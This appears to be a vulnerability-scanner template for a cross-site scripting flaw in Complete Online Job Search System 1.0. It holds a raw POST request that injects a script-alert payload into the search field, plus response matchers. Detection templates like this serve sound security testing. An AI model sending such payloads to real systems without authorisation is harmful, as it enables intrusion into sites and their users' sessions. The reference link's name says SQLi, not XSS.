id: eris-xss info: name: Complete Online Job Search System 1.0 - Cross-Site Scripting author: arafatansari severity: high description: | Complete Online Job Search System 1.0 contains a cross-site scripting vulnerability via index.php?q=advancesearch. reference: - https://github.com/debug601/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-9.md classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 metadata: max-request: 1 verified: true tags: cve,cve2022,xss,eris http: - raw: - | POST /index.php?q=result&searchfor=advancesearch HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded SEARCH=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&COMPANY=&CATEGORY=&submit=Submit matchers-condition: and matchers: - type: word part: body words: - 'Result : ' - 'ERIS' condition: and - type: word part: header words: - text/html - type: status status: - 200 # Enhanced by md on 2022/09/20